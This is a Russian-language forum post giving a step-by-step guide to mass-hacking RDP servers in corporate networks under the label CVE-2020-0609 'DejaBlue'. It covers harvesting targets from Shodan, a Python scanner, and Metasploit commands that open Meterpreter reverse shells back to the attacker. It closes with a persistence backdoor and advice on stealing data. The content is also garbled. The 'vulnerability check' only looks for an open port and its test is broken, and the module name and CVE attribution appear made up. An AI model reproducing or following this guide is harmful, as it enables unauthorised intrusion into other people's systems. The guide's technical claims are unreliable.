Массовый эксплойт CVE-2020-0609 (DejaBlue)

[TwinFoxer]

Взлом RDP и доступ к корпоративным сетям: Массовый эксплойт CVE-2020-0609 (DejaBlue)​

Привет, ребята! Сегодня я хочу поделиться с вами детальным гайдом по массовому взлому RDP с использованием эксплойта CVE-2020-0609, также известного как DejaBlue.
Этот метод позволяет удалённое исполнение кода и может быть использован для получения контроля над множеством систем в корпоративной сети.
Давайте разберём этот процесс от начала и до конца, включая скрипт на Python для определения уязвимых целей и получение списка IP-адресов из Shodan.

Введение​

RDP — это протокол, который позволяет пользователям удалённо подключаться к своим компьютерам через сеть.
Он широко используется в корпоративных сетях для удалённого администрирования и доступа к рабочим станциям.
Однако, как и любой протокол, RDP имеет свои уязвимости, которые могут быть использованы злоумышленниками для несанкционированного доступа.

Подготовка​

1. Сбор списка IP-адресов из Shodan​

Shodan — это поисковая система для интернета вещей, которая позволяет находить устройства, подключённые к интернету, включая системы с открытыми портами RDP. Мы можем использовать Shodan для поиска целевых IP-адресов.

Пример запроса для Shodan:​

shodan search "port:3389"

Этот запрос вернёт список IP-адресов, на которых открыт порт 3389 (RDP). Вы можете сохранить этот список в текстовый файл, например, ip_list.txt.

2. Установка необходимых инструментов​

Для выполнения атаки нам понадобятся несколько инструментов:

• Nmap для сканирования портов и обнаружения уязвимостей.
• Metasploit для эксплуатации уязвимостей.
• Python для написания скриптов.

Установите эти инструменты на вашу систему:

sudo apt-get install nmap metasploit-framework python3

Скрипт на Python для определения уязвимых целей​

Создадим скрипт на Python, который будет проверять каждый IP-адрес из списка на наличие уязвимости CVE-2020-0609.

import nmap

def check_vulnerability(ip):
    nm = nmap.PortScanner()
    nm.scan(ip, '3389')
    for host in nm.all_hosts():
        if '3389/open' in nm[host]['tcp']:
            print(f"IP {ip} is vulnerable to CVE-2020-0609")
            return True
    return False

def main():
    with open('ip_list.txt', 'r') as file:
        ip_list = file.readlines()

    vulnerable_ips = []
    for ip in ip_list:
        ip = ip.strip()
        if check_vulnerability(ip):
            vulnerable_ips.append(ip)

    print("Vulnerable IPs:")
    for ip in vulnerable_ips:
        print(ip)

if __name__ == "__main__":
    main()

Инструкции по использованию скрипта:​

1. Сохраните скрипт в файл, например, check_vulnerability.py.
2. Создайте текстовый файл ip_list.txt и добавьте в него список IP-адресов, полученный из Shodan, по одному на строку.
3. Запустите скрипт:

python3 check_vulnerability.py

Скрипт проверит каждый IP-адрес на наличие открытого порта 3389 (RDP) и выведет список уязвимых IP-адресов.

Эксплуатация уязвимости​

Теперь, когда у нас есть список уязвимых IP-адресов, мы можем приступить к эксплуатации уязвимости CVE-2020-0609 с помощью Metasploit.

Шаги:

1. Запуск Metasploit:
   
   msfconsole
   
   
2. Выбор эксплойта:
   
   use exploit/windows/rdp/ms20_06_09_dejablue
   
   
3. Настройка параметров:
   
   set RHOSTS <vulnerable_ips>
   set RPORT 3389
   set PAYLOAD windows/x64/meterpreter/reverse_tcp
   set LHOST <your_ip>
   set LPORT 4444
   set ExitOnSession false
   Замените <vulnerable_ips> на список уязвимых IP-адресов, полученный из скрипта, и <your_ip> на ваш IP-адрес. Параметр ExitOnSession false обеспечивает, что сессии будут оставаться активными после успешной эксплуатации.
   
   
4. Запуск эксплуатации:
   
   
   exploit

Metasploit начнёт эксплуатацию уязвимости на всех указанных IP-адресах. После успешной эксплуатации вы получите оболочку Meterpreter с правами SYSTEM на каждой уязвимой системе.

Получение доступа​

После успешной эксплуатации уязвимости вы получите оболочку Meterpreter, которая позволит вам выполнять любые команды на удалённой системе. Вы можете использовать Meterpreter для дальнейшего проникновения в сеть, установки бэкдоров, перехвата данных и выполнения других злоумышленных действий.

Пример использования Meterpreter:​

1. Получение системной оболочки:
   
   meterpreter > shell
2. Выполнение команд:
   
   
   C:\Windows\system32> whoami
   nt authority\system
   
   
3. Установка постоянного доступа:
   Вы можете установить бэкдор или создать новую учётную запись пользователя для постоянного доступа.
   
   meterpreter > run persistence -U -P <password> -i 5 -r 192.168.1.100 -p 4444

Заключение​

Массовый взлом RDP с использованием эксплойта CVE-2020-0609 (DejaBlue) — это мощный метод для получения контроля над множеством систем в корпоративной сети.
С помощью скрипта на Python, Shodan и Metasploit вы можете автоматизировать процесс обнаружения уязвимостей и их эксплуатации.
Всегда держите руку на пульсе и следите за новыми уязвимостями и методами атаки. Надеюсь, этот гайд окажется полезным в вашей работе!
Если у вас есть свои методы или улучшения, делитесь в комментах.